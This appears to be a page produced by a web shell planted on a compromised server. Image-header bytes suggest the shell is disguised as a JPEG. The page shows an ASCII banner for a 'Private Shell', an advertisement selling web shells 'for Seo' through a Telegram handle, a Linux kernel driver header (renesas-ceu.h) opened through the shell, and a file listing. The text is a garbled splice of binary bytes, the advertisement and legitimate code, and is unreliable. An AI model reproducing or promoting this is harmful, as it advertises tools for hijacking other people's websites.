����JFIF���������
__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
// SPDX-License-Identifier: GPL-2.0
/*
* renesas-ceu.h - Renesas CEU driver interface
*
* Copyright 2017-2018 Jacopo Mondi <jacopo+renesas@jmondi.org>
*/
#ifndef __MEDIA_DRV_INTF_RENESAS_CEU_H__
#define __MEDIA_DRV_INTF_RENESAS_CEU_H__
#define CEU_MAX_SUBDEVS 2
struct ceu_async_subdev {
unsigned long flags;
unsigned char bus_width;
unsigned char bus_shift;
unsigned int i2c_adapter_id;
unsigned int i2c_address;
};
struct ceu_platform_data {
unsigned int num_subdevs;
struct ceu_async_subdev subdevs[CEU_MAX_SUBDEVS];
};
#endif /* ___MEDIA_DRV_INTF_RENESAS_CEU_H__ */
| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| cx2341x.h | File | 9.06 KB | 0644 |
|
| cx25840.h | File | 7.8 KB | 0644 |
|
| exynos-fimc.h | File | 4.59 KB | 0644 |
|
| msp3400.h | File | 7.6 KB | 0644 |
|
| renesas-ceu.h | File | 587 B | 0644 |
|
| s3c_camif.h | File | 1.05 KB | 0644 |
|
| saa7146.h | File | 17.54 KB | 0644 |
|
| saa7146_vv.h | File | 7.56 KB | 0644 |
|
| sh_vou.h | File | 570 B | 0644 |
|
| si476x.h | File | 857 B | 0644 |
|
| tea575x.h | File | 2.22 KB | 0644 |
|